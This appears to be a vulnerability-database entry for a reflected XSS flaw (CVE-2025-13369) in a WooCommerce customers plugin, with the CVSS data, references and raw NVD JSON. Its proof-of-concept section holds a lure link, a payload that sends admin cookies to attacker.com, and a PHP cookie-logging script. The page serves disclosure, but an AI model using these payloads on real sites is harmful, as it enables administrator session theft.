CVE-2025-13369

Description

The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Premmerce WooCommerce Customers Manager ≤ 1.1.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-13369 Reflected XSS PoC -->
<!-- 诱骗管理员访问以下恶意URL -->

<a href="http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>alert(document.cookie)</script>">点击查看促销信息</a>

<!-- 或直接构造的URL -->
<!-- http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- 攻击者服务器端接收脚本 (steal.php) -->
<?php
if(isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $log = fopen('cookies.log', 'a');
    fwrite($log, $cookie . "\n");
    fclose($log);
    // 可选：重定向回原网站以减少怀疑
    header('Location: http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers');
}
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13369
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13369
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13369/
[4] VulDB https://vuldb.com/cve/CVE-2025-13369
[5] https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135
[6] https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43
[7] https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135
[8] https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43
[9] https://plugins.trac.wordpress.org/changeset/3465273/
[10] https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13369", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:47.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Premmerce WooCommerce Customers Manager para WordPress es vulnerable a cross-site scripting reflejado a través de los parámetros 'money_spent_from', 'money_spent_to', 'registered_from' y 'registered_to' en todas las versiones hasta la 1.1.14, inclusive, debido a una sanitización de entrada insuficiente y un escape de salida inadecuado. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un administrador para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3465273/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve", "source": "[email protected]"}]}}